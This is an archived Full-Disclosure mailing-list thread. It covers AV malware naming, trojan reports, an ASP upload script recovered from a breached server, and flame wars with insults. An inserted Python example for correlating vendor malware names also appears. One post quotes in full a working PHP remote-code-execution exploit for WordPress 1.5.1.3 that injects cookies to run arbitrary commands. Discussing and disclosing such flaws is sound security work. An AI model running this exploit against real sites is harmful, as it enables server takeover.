> But the thing is, you don't know that. So stop bashing me and showing off.
> You can shine by your actions, not by your reputation...

So what is your knowledge about malware naming ?
You know about the wildlist and its problems, Vgrep, CARO, 'naming.txt'
and its use in the last 10 years ?
You have ever tried to maintain and work with a malware collection ?
You know about previous (and more in-depth) discussions on this topic ?
You've read at least http://www.securityfocus.com/infocus/1587
and http://www.virusbtn.com/magazine/archives/200301/caro.xml
to get a basic idea of the problem ?
So what rational fact makes you believe you know this better than everyone
else ?


> All change starts small. Maybe discussions such as this will wake people up,
> maybe there will even be a voiced demand from the public. That DOES hurt
> sales, thus shareholders, which is what you need to have done, right ?
> The only thing I'm sure about is, YOU will not be instrumental in this.

Do you really think, there were any new ideas here ?
For an example, here at the antiVirusTestCenter we have discussed the naming
problems for years. But even the partial solutions that have been realized
(LOKMM, VMacro-Server) haven't caused significant changes. And this was in
cooperation with many AV researchers.
How should such an annoying thread like this really help ? Do you also
believe you can convince MS to make Windows OpenSource just by posting here ?


> Well, just for you, to make it simple.
> At Time T you find a virus and name it whatever you like (just as you do now).
> From time T until T+48h you have the "all-important hours" of confusion as
> you are so adamant to repeat at every opportunity. So let there be confusion.
> At Time T+50 you agree upon a singular standardized name and rename it.
>
> So, compared to now, what has changed between T and T+48 ?? Nothing. So stop
> complaining about me messing up those "all-important hours" of yours. I'm
> not messing anything up. I'm renaming when the panic has died down.
> Get it now ?!?!

And what is the benefit of your proposal? Have you considered that it may
be just another source of confusion ? There could be uncoordinated
renamings, the same malware alerts with old and new names (but this time
from the same vendor). Administrators may not be able to compare scan reports
from different malware definition updates because the names changed in
between.


> > The first few hours _under current processes_ produce nearly all of the
> > confusion caused by naming inconsistencies. Media outlets latch onto
>
> This is not a scientific fact, and I do not agree with you.

I can't remember _any_ scientific fact in this thread.

--
Michel Messerschmidt lists [at] michel-messerschmidt
antiVirusTestCenter, Computer Science, University of Hamburg

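The correlation problem argued over in this and the previous post, as an added example that is not code from the thread or from any AV vendor: three vendors report FooBar.AB, FooBar.AC and FooBar.AD within minutes (one virus or three?), and after a rename at T+50h a host's scan reports from before and after the definition update no longer agree by name. The example keeps a vendor-neutral family id with a dated alias history so that alerts and reports compare by family rather than by name; all vendor names, family ids, hosts and timestamps are constructed.

```python
"""Added example (not from the thread or any vendor): correlate AV alerts
across vendors and across a post-outbreak rename by mapping each vendor's
name, as in force at a given time, to a vendor-neutral family id.
All vendor names, family ids, hosts and times below are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set, Tuple

@dataclass(frozen=True)
class Alias:
    vendor: str
    name: str
    valid_from: datetime  # the vendor uses this name from here on

@dataclass(frozen=True)
class Alert:
    vendor: str
    name: str
    seen_at: datetime
    host: str

class NameResolver:
    """(vendor, name, time) -> (family id, stale), honouring the alias history."""
    def __init__(self) -> None:
        self._aliases: Dict[str, List[Alias]] = {}

    def register(self, family_id: str, vendor: str, name: str,
                 valid_from: datetime) -> None:
        self._aliases.setdefault(family_id, []).append(
            Alias(vendor, name, valid_from))

    def resolve(self, vendor: str, name: str,
                seen_at: datetime) -> Optional[Tuple[str, bool]]:
        # Only aliases that existed at seen_at count; a hit on a name the
        # vendor has since retired is flagged stale: that scanner's
        # definitions predate the rename.
        for family_id, aliases in self._aliases.items():
            in_force = [a for a in aliases
                        if a.vendor == vendor and a.valid_from <= seen_at]
            if any(a.name == name for a in in_force):
                current = max(in_force, key=lambda a: a.valid_from).name
                return family_id, current != name
        return None

def correlate(resolver: NameResolver, alerts: List[Alert]):
    """Group a burst of alerts by family; also return unknown and stale ones."""
    families: Dict[str, Set[Tuple[str, str]]] = {}
    unknown: List[Alert] = []
    stale: List[Alert] = []
    for a in alerts:
        r = resolver.resolve(a.vendor, a.name, a.seen_at)
        if r is None:
            unknown.append(a)
            continue
        family_id, is_stale = r
        families.setdefault(family_id, set()).add((a.vendor, a.name))
        if is_stale:
            stale.append(a)
    return families, unknown, stale

def compare_scan_reports(resolver: NameResolver, earlier: List[Alert],
                         later: List[Alert]) -> Dict[str, Set[str]]:
    """Diff two scans of one host taken under different definition sets:
    the raw diff is what the admin sees, the family diff is what changed."""
    def fams(report: List[Alert]) -> Set[str]:
        found = [resolver.resolve(a.vendor, a.name, a.seen_at) for a in report]
        return {r[0] for r in found if r is not None}
    raw_b, raw_a = {a.name for a in earlier}, {a.name for a in later}
    fam_b, fam_a = fams(earlier), fams(later)
    return {"raw_gone": raw_b - raw_a, "raw_new": raw_a - raw_b,
            "families_gone": fam_b - fam_a, "families_new": fam_a - fam_b,
            "families_persisting": fam_b & fam_a}

# Constructed timeline: T is the first sighting, the agreed rename lands at T+50h.
T = datetime(2004, 8, 13, 9, 0)
H, M = timedelta(hours=1), timedelta(minutes=1)

def build_resolver() -> NameResolver:
    r = NameResolver()
    r.register("FAM-0001", "VendorA", "FooBar.AB", T)  # each vendor's own
    r.register("FAM-0001", "VendorB", "FooBar.AC", T)  # first-hour name
    r.register("FAM-0001", "VendorC", "FooBar.AD", T)
    r.register("FAM-0001", "VendorB", "FooBar.AB", T + 50 * H)  # B and C
    r.register("FAM-0001", "VendorC", "FooBar.AB", T + 50 * H)  # adopt A's
    r.register("FAM-0002", "VendorB", "FooBar.AE", T + 3 * H)  # a real 2nd variant
    return r

FIRST_ALERTS = [  # three names in 15 minutes for one virus, plus a real second one
    Alert("VendorA", "FooBar.AB", T + 5 * M, "mailgw1"),
    Alert("VendorB", "FooBar.AC", T + 9 * M, "mailgw1"),
    Alert("VendorC", "FooBar.AD", T + 14 * M, "fileserv2"),
    Alert("VendorB", "FooBar.AE", T + 3 * H, "ws-017"),
]
# One host scanned by VendorC before and after the rename: never cleaned,
# yet by raw name one threat "left" and another "arrived".
SCAN_T10 = [Alert("VendorC", "FooBar.AD", T + 10 * H, "fileserv2")]
SCAN_T60 = [Alert("VendorC", "FooBar.AB", T + 60 * H, "fileserv2")]
```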


kf_lists at secnetops

Sep 3, 2004, 12:35 PM

Post #111 of 180 (2700 views)
Re: (no subject) (try using a friggin subject line...) [In reply to]

I'm Rick James bitch!
-KF


Adam wrote:
>
> who are you friggen Dr Evil?
>
> On Friday 13 August 2004 07:04 pm, KF_lists wrote:
>
>>>Insert subject here --------------------^
>>>
>>>-KF
>>>
>



d4yj4y at yahoo

Apr 26, 2005, 2:57 PM

Post #112 of 180 (2713 views)
Re: (no subject) [In reply to]

Man, ppl are such crybabies!

--- Paul Schmehl <pauls [at] utdallas> wrote:
> --On Tuesday, April 26, 2005 03:05:29 PM -0400 Stan Bubrouski
> <stan.bubrouski [at] gmail> wrote:
>
> > Could we can the nazi rhetoric in messages on this list? Or can we just
> > complain until the list loses its hosting?
> >
> That makes a great deal of sense. One poster sends stuff you find
> offensive, so you want to shut down the entire list?
>
> Yeah, makes perfect sense. Next you'll tell us you're going to take your
> ball and go home.
>
> Paul Schmehl (pauls [at] utdallas)
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


toddtowles at brookshires

Jun 3, 2005, 7:41 AM

Post #113 of 180 (2704 views)
RE: (no subject) [In reply to]

This could be another bot running on the same filename, but here is
something I found on google

Norton Antivirus 2004(vir def may-2005) report wintcpmod.exe is infected
with W32.DSS.Trojan. The file was deleted and WinXP Sp2 work without
problems.

http://www.what-process.com/process-info.aspx?p=wintcpmod.exe.exe

> -----Original Message-----
> From: full-disclosure-bounces [at] lists
> [mailto:full-disclosure-bounces [at] lists] On Behalf Of andy mueller
> Sent: Friday, June 03, 2005 8:17 AM
> To: full-disclosure [at] lists
> Subject: [Full-disclosure] (no subject)
>
> HI people I have had "wintcpmod" as well so I submitted it
> to norton antivirus and they came back to me with this:
>
> We have analyzed your submission. The following is a report of our
> findings for each file you have submitted:
>
> filename: C:\WINDOWS\system32\wintcpmod.exe
> machine: ALIEN
> result: This file is infected with Backdoor.Trojan
>
> Developer notes:
> C:\WINDOWS\system32\wintcpmod.exe is non-repairable threat. NAV with
> the latest rapidrelease definition detects this. Please delete this
> file and replace it if neccessary. Please follow the instruction at the
> end of this email message to install the latest rapidrelease
> definitions.
>
> Symantec Security Response has determined that the sample(s) that you
> provided are infected with a virus, worm, or Trojan. We have created
> RapidRelease definitions that will detect this threat. Please follow the
> instruction at the end of this email message to download and install
> the latest RapidRelease definitions.
>
> Downloading and Installing RapidRelease Definition Instructions:
> 1. Open your Web browser. If you are using a dial-up connection, connect
> to any Web site, such as: http://securityresponse.symantec.com/
> 2. Click this link to the ftp site:
> ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe.
> If it does not go to the site (this could take a minute or so if you
> have a slow connection), copy and paste the address into the address bar
> of your Web browser and then press Enter.
> 3. When a download dialog box appears, save the file to the Windows
> desktop.
> 4. Double-click the downloaded file and follow the prompts.
> ----------------------------------------------------------------------
> This message was generated by Symantec Security Response automation
>
> Should you have any questions about your submission, please contact
> our regional technical support from the Symantec website
> (http://www.symantec.com/techsupp/)
> and give them the tracking number in the subject of this message.
>


arr at watson

Jun 3, 2005, 9:57 AM

Post #114 of 180 (2714 views)
RE: (no subject) [In reply to]

Have you pushed it through Norman Sandbox?

On Fri, 3 Jun 2005, Todd Towles wrote:

:This could be another bot running on the same filename, but here is
:something I found on google
:
:Norton Antivirus 2004(vir def may-2005) report wintcpmod.exe is infected
:with W32.DSS.Trojan. The file was deleted and WinXP Sp2 work without
:problems.
:
: http://www.what-process.com/process-info.aspx?p=wintcpmod.exe.exe
:

--
Andrew R. Reiter
arr [at] watson


kf_lists at digitalmunition

Aug 9, 2005, 9:13 AM

Post #115 of 180 (2695 views)
Re: (no subject) [In reply to]

Maybe next I can enjoy a subject line?
-KF


kartoffelguru [at] hush wrote:

>now enjoy as attachment...
>
>
>------------------------------------------------------------------------
>
><?php
> echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\n";
> echo "(C) Copyright 2005 Kartoffelguru\n\n";
> echo "[!] info: requires register_globals turned on on target host\n\n";
> if (!extension_loaded('curl')) {
> die ("[-] you need the curl extension activated...\n");
> }
>
> function usage()
> {
> die ("usage:\n\t./wpx.php -h http://www.xyz.net/blog/ -c 'system(\"uname -a;id\");'\n\n");
> }
>
> $options = getopt("h:c:");
> if (count($options) < 1 || !isset($options['h'])) {
> usage();
> }
>
> $host = (is_array($options['h']) ? $options['h'][0]:$options['h']);
> $cmd = (is_array($options['c']) ? $options['c'][0]:$options['c']);
>
> if (!preg_match("/^http:\/\//", $host, $dummy)) {
> usage();
> }
>
> if (strlen(trim($cmd))==0) {
> $cmd = 'phpinfo();';
> }
>
> $code = base64_encode($cmd);
> $cnv = "";
> for ($i=0;$i<strlen($code); $i++) {
> $cnv.= "chr(".ord($code[$i]).").";
> }
> $cnv.="chr(32)";
>
> $str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');
>
> $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;';
> $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;';
> $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';
> $cookie.=$str;
> $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;';
> $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;';
> $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;';
>
> $ch = curl_init();
> curl_setopt($ch, CURLOPT_URL, $host);
> curl_setopt($ch, CURLOPT_POST, 0);
> curl_setopt($ch, CURLOPT_COOKIE, $cookie);
> curl_setopt($ch, CURLOPT_HEADER, 0);
> curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
> curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
> curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
> curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
> echo "[+] now executing\n\n";
>
> $r = curl_exec($ch);
> curl_close($ch);
>
> echo $r;
>
>?>
>
>------------------------------------------------------------------------
>
>



stan.bubrouski at gmail

Aug 9, 2005, 10:26 AM

Post #116 of 180 (2681 views)
Re: (no subject) [In reply to]

LOL, and he didn't put a subject on either message...

On 8/9/05, KF (lists) <kf_lists [at] digitalmunition> wrote:
> Maybe next I can enjoy a subject line?
> -KF
>
<SNIP>


ademar.gonzalez at gmail

Sep 28, 2005, 7:38 AM

Post #117 of 180 (2690 views)
Re: (no subject) [In reply to]

Hi Aditya

On 9/28/05, Aditya Deshmukh
<aditya.deshmukh [at] online> wrote:
> Recently 2 days ago I saw this in a compromised system.
>
>
> Both this file and cpshost.dll were deleted from C:\InetPub\scripts
> This file was recovered but I was unable to recover cpshost.dll....
>
>
> Anyone know what is this ?
>

It is an upload script, cpshost.dll is the Posting Acceptor ActiveX control :

http://support.microsoft.com/kb/q230298/


>
> <% Response.Buffer = TRUE %>
>
> Version=1.5
> <%
> PathToPA = "http://" + Request.ServerVariables("SERVER_NAME") +
> "/scripts/cpshost.dll"
>
>
> PostingURL = PathToPA + "?PUBLISH"
>
> TargetURL = "http://" + Request.ServerVariables("SERVER_NAME")
> %>
>
> [{8B14B770-748C-11D0-A309-00C04FD7CFC5}]
> PostingURL="<%= PostingURL %>"
> TargetURL="<%= TargetURL %>"
> ComponentInstall="yes"
>

ciao ciao
ademar


stevenrakick at yahoo

Mar 4, 2006, 8:28 PM

Post #118 of 180 (2638 views)
Re: (no subject) [In reply to]

Not that it matters but...

Received: from www.c0replay.net (unknown [206.251.72.74])
        by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
        for <full-disclosure [at] lists>; Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure [at] lists
From: Steven Rakick <stevenrakick [at] yahoo>
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59 [at] www>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]




perfect.material at gmail

Mar 4, 2006, 9:34 PM

Post #119 of 180 (2647 views)
Re: (no subject) [In reply to]

Dick Breath,

You should sign your electronic mail with some unhackable crypto
technology. That way you will never need to show off your cut and paste
technology to the others. You are irresponsible. Not that it matters but...

PERFECT.MATERIAL


On 3/4/06, Steven Rakick <stevenrakick [at] yahoo> wrote:


nick at nickwithers

Mar 27, 2006, 6:19 PM

Post #120 of 180 (2571 views)
Re: (no subject) [In reply to]

On Tue, 28 March, 2006 10:00 am, Alexander Hristov wrote:
> IM not saying the entire disk !

Well, logically speaking a partition is essentially an "entire disk", even
if it is one of 14 hypothetical "entire disks".

> Only the partition u choose the torrent to be saved in has to be full
> Like when u have 14 partitions and one of them is full i dont think
> this is a problem ?

It is if you're trying to write more data to it! :-)

> So this is a security bug

Not sure if you'd call it a *security* bug. Certainly should be handled
better though!

> On 3/27/06, Stan Bubrouski <stan.bubrouski [at] gmail> wrote:
>> This really doesn't seem like a security bug though... sure some site
>> could target opera users and try to force them to download torrents,
>> but when your disk is already full this sounds like the least of your
>> problems...
>>
>> -sb
>>
>> On 3/27/06, Alexander Hristov <joffer [at] gmail> wrote:
>> > Opera > 8.02 with torrent support cant handle not enough space on drive
>> >
>> > If your partition is full and u choose to save a torrent on this
>> > partition opera will start using 100% of your cpu and memory and
>> > eventually crash
>> >
>> > Tested with opera 9 p 2
>> > --
>> > Best Regards,
>> > Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
>> >
>> >
>>
>
>
> --
> Best Regards,
> Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
>
>

P.S.: Sorry about my time zone not being set correctly!

--
Nick Withers
email: nick [at] nickwithers
Web: http://www.nickwithers.com
Mobile: +61 414 397 446



octetstream at gmail

Mar 30, 2006, 1:08 PM

Post #121 of 180 (2567 views)
Re: (no subject) [In reply to]

On 3/30/06, n3td3v <n3td3v [at] gmail> wrote:
>
> The most powerful hackers in the world being told to get off fd, well that
> says a lot for fd then doesn't it. I'll be off and leave you skids to it. I
> don't want to hold up your list of "free vulnerabilities and exploits" which
> you stalk this list for, because none of you can find your own
> vulnerabilities to hack the planet with, bye.
>
>
If by powerful you mean retarded and by hackers you mean retards... You
haven't contributed shit to this list other than noise you moron. Come back
when you grow some pubes or after the brain transplant.


stan.bubrouski at gmail

Mar 30, 2006, 2:06 PM

Post #122 of 180 (2566 views)
Re: (no subject) [In reply to]

Name one powerful hacker kicked out of here? Just one. And you don't
count (neither do I but I've never claimed to be an expert or
important).

-sb

On 3/30/06, n3td3v <n3td3v [at] gmail> wrote:
> The most powerful hackers in the world being told to get off fd, well that
> says a lot for fd then doesn't it. I'll be off and leave you skids to it. I
> don't want to hold up your list of "free vulnerabilities and exploits" which
> you stalk this list for, because none of you can find your own
> vulnerabilities to hack the planet with, bye.
>
>
> On 3/30/06, s89df987 s9f87s987f <a059d8e0a9s8d0 [at] hotmail> wrote:
> > n3td3v be gone like you said you would.
> >
> > and Kevin Mitnick is just a flashy name used to get ppl to buy
> >
> > On 3/30/06, n3td3v <n3td3v [at] gmail> wrote:
> > >
> > > Nah dude, he stood in defence of Kevin Mitnick, works with the UN,
> > > whitehouse, fbi etc. He's a world leading advisor with much influence on
> > > the super powers of the world in relation to information technology security.
> > >
> > > http://www.nytimes.com/2005/07/31/business/yourmoney/31hack.html?ex=1280462400&en=311d897de4ab090a&ei=5088&partner=rssnyt&emc=rss
> > > http://www.msbit.com/mis.html
> > > http://www.cutter.com/consultants/seidenm.html
> > >
> > > He's highly respected in the government and corporate circuits of the world.
> > > Every time I speak to him he's in another part of the world preparing to
> > > go into talks with a government or corporation. By no means a script kid who
> > > got lucky. He and people as high up as him are the real people who run U-S
> > > government and corporate interests. We all know when we think of George W
> > > Bush, we all know he's not that powerful and takes advice from the real
> > > advisors in control of the world, that you never see or hear about in
> > > public, well Seiden is your man.
> > >
> > > On 3/30/06, Valdis.Kletnieks [at] vt <Valdis.Kletnieks [at] vt> wrote:
> > > > On Wed, 29 Mar 2006 23:36:28 +0100, n3td3v said:
> > > > > You mean like Seiden who broke into banks and told everyone about it,
> > > > > and is now one of the biggest security experts in the industry. He sent
> > > > > me an e-mail telling me a week or so back telling me to take you
> > > > > seriously, I'm beginning to wonder why.
> > > >
> > > > On Wed, 29 Mar 2006 23:56:48 +0100, n3td3v said:
> > > > > that's the current situation, up to date. Seiden at yahoo (security
> > > > > consultant/advisor/hacker) whatever you want to call him is now pissed
> > > > > off because he's getting no info feed into his corporate security team
> > > > > anymore...
> > > >
> > > > You'd think if Seiden was leet enough to break into banks, he'd be
> > > > able to apply the same techniques to Yahoo and not need an external feed.
> > > > Unless of course he was just a skiddy who whacked the banks with some
> > > > exploit he stole from somebody else and didn't understand....

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


very at unprivate

Mar 30, 2006, 2:27 PM

Post #123 of 180 (2564 views)
Permalink
RE: (no subject) [In reply to]

No, please.. Really, keep your word just this one time.

-----Original Message-----
From: full-disclosure-bounces [at] lists
[mailto:full-disclosure-bounces [at] lists] On Behalf Of n3td3v
Sent: Thursday, March 30, 2006 10:55 PM
To: s89df987 s9f87s987f; full-disclosure [at] lists
Subject: Re: [Full-disclosure] (no subject)


The most powerful hackers in the world being told to get off fd, well
that says a lot for fd then doesn't it. I'll be off and leave you skids
to it. I don't want to hold up your list of "free vulnerabilities and
exploits" which you stalk this list for, because none of you can find
your own vulnerabilities to hack the planet with, bye.


On 3/30/06, s89df987 s9f87s987f <a059d8e0a9s8d0 [at] hotmail> wrote:

n3td3v be gone like you said you would.

and Kevin Mitnick is just a flashy name used to get ppl to buy

On 3/30/06, n3td3v <n3td3v [at] gmail> wrote:
>
> Nah dude, he stood in defence of Kevin Mitnick, works with the UN,
> whitehouse, fbi etc. He's a world leading advisor with much influence on
> the super powers of the world in relation to information technology security.
>
> http://www.nytimes.com/2005/07/31/business/yourmoney/31hack.html?ex=1280462400&en=311d897de4ab090a&ei=5088&partner=rssnyt&emc=rss
> http://www.msbit.com/mis.html
> http://www.cutter.com/consultants/seidenm.html
>
> He's highly respected in the government and corporate circuits of the world.
> Every time I speak to him he's in another part of the world preparing to
> go into talks with a government or corporation. By no means a script kid who
> got lucky. He and people as high up as him are the real people who run U-S
> government and corporate interests. We all know when we think of George W
> Bush, we all know he's not that powerful and takes advice from the real
> advisors in control of the world, that you never see or hear about in
> public, well Seiden is your man.
>
> On 3/30/06, Valdis.Kletnieks [at] vt <Valdis.Kletnieks [at] vt> wrote:
> > On Wed, 29 Mar 2006 23:36:28 +0100, n3td3v said:
> > > You mean like Seiden who broke into banks and told everyone about it,
> > > and is now one of the biggest security experts in the industry. He sent
> > > me an e-mail telling me a week or so back telling me to take you
> > > seriously, I'm beginning to wonder why.
> >
> > On Wed, 29 Mar 2006 23:56:48 +0100, n3td3v said:
> > > that's the current situation, up to date. Seiden at yahoo (security
> > > consultant/advisor/hacker) whatever you want to call him is now pissed
> > > off because he's getting no info feed into his corporate security team
> > > anymore...
> >
> > You'd think if Seiden was leet enough to break into banks, he'd be
> > able to apply the same techniques to Yahoo and not need an external feed.
> > Unless of course he was just a skiddy who whacked the banks with some
> > exploit he stole from somebody else and didn't understand....

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


hdw at kallisti

Mar 30, 2006, 2:36 PM

Post #124 of 180 (2565 views)
Permalink
Re: (no subject) [In reply to]

Stan Bubrouski wrote:
> Name one powerful hacker kicked out of here? Just one. And you don't
> count (neither do I but I've never claimed to be an expert or
> important).
Kicked from a public un-moderated mailing list?

How?

Now, if you don't like the noise, why don't you just shut the fuck up instead of answering the trolls?

The noise isn't the idiot mailings, the noise is people who should know better answering the morons.

_don't answer morons_ it serves no purpose.

If someone posts something that is misguided or bad, then sure correct me (or us).
But if someone posts something moronic, then please ignore.
You're only helping the moron.

I again refrain to the best proverb I've heard (and he's a windows guru, shudder)

"Don't argue with an idiot, he'll just drag the discussion to his level and beat you with experience."

So, if someone posts something silly or moronic, giggle, groan and delete.
Do _not_ respond to prove that he (or remotely possibly she) is a moron.
If we haven't got that already we have ourselves to blame.

Oh, and of course, this is for 'us', boring grayhats who want to read a clean list of the latest exploits every morning.

Non-grayhats who want to annoy us are of course free to do so, after all, it is un-moderated and it's full-disclosure.

So configure your frikken filters and stop responding to idiots.

// hdw

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


n3td3v at gmail

Mar 30, 2006, 3:11 PM

Post #125 of 180 (2566 views)
Permalink
Re: (no subject) [In reply to]

Funny you should think FD isn't already moderated, our main
xploitable [at] gmail address has been moderated for months, hence the reason
we're using n3td3v [at] gmail . This might be an interesting read for you
"freedom of speech" Americans, who are currently bombing the hell out of the
middle east to uphold, yet on FD, there is no democracy and freedom of
expression...

http://groups.google.com/group/n3td3v/browse_thread/thread/34e8f243bbddaf3e/ac7e9f73de66f10f

http://groups.google.com/group/n3td3v/browse_thread/thread/64a322968d71fe3b/d3db5e88d9f91d88

http://groups.google.com/group/n3td3v/msg/5b3d7afe80dde4d3

Someone tell George W Bush to drop a bomb on John Cartwright's head, since
he doesn't believe in "freedom", he must be a terrorist.... ;-)

We ask John Cartwright to unmoderate xploitable [at] gmail or you must be
with the terrorists... and if you don't then someone might need to tell
president [at] whitehouse and then you might get mentioned on his press
conferences or radio addresses as being part of the "axis of evil".

On 3/30/06, Anders B Jansson <hdw [at] kallisti> wrote:
>
> Stan Bubrouski wrote:
> > Name one powerful hacker kicked out of here? Just one. And you don't
> > count (neither do I but I've never claimed to be an expert or
> > important).
> Kicked from a public un-moderated mailing list?
>
> How?
>
> Now, if you don't like the noise, why don't you just shut the fuck up
> instead of answering the trolls?
>
> The noise isn't the idiot mailings, the noise is people who should know
> better answering the morons.
>
> _don't answer morons_ it serves no purpose.
>
> If someone posts something that is misguided or bad, then sure correct me
> (or us).
> But if someone posts something moronic, then please ignore.
> You're only helping the moron.
>
> I again refrain to the best proverb I've heard (and he's a windows guru,
> shudder)
>
> "Don't argue with an idiot, he'll just drag the discussion to his level
> and beat you with experience."
>
> So, if someone posts something silly or moronic, giggle, groan and delete.
> Do _not_ respond to prove that he (or remotely possibly she) is a moron.
> If we haven't got that already we have ourselves to blame.
>
> Oh, and of course, this is for 'us', boring grayhats who want to read a
> clean list of the latest exploits every morning.
>
> Non-grayhats who want to annoy us are of course free to do so, after all,
> it is un-moderated and it's full-disclosure.
>
> So configure your frikken filters and stop responding to idiots.
>
> // hdw
